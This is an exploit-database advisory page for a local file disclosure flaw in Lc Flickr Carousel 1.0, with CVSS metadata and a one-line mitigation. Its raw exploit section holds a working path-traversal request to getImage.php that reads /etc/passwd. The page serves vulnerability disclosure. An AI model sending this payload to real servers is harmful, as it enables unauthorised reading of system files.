header-logo
Suggest Exploit
vendor:
Lc Flickr Carousel
by:
GoLd_M
7,5
CVSS
HIGH
Local File Disclosure Vulnerability
200
CWE
Product Name: Lc Flickr Carousel
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: No
Related CWE: N/A
CPE: a:lcflickr:lc_flickr_carousel:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2012

Lc Flickr Carousel V1.0 => Local File Disclosure Vulnerability

Lc Flickr Carousel V1.0 is vulnerable to a local file disclosure vulnerability. An attacker can exploit this vulnerability by sending a crafted request to the getImage.php script with a file parameter containing a relative path to the file they wish to access. This can be used to access sensitive files such as the /etc/passwd file.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.
Source

Exploit-DB raw data:

# Exploit Title: Lc Flickr Carousel V1.0 => Local File Disclosure Vulnerability
# Date: 11/07/2012
# Author: GoLd_M
# Vendor or Software Link: http://code.google.com/p/lcflickr/downloads/list
# Version: 1.0
# Category::  Local File Disclosure Vulnerability2
# Tested on: Xp SP 2
# Ex : 	[Lc Flickr Carousel V1.0]/scripts/getImage.php?file=../../../../../../../../../../../../../../etc/passwd
# See Test :  http://upload.traidnt.net/upfiles/66w29123.jpg

Navigation

Suggest Exploit

Services By CQR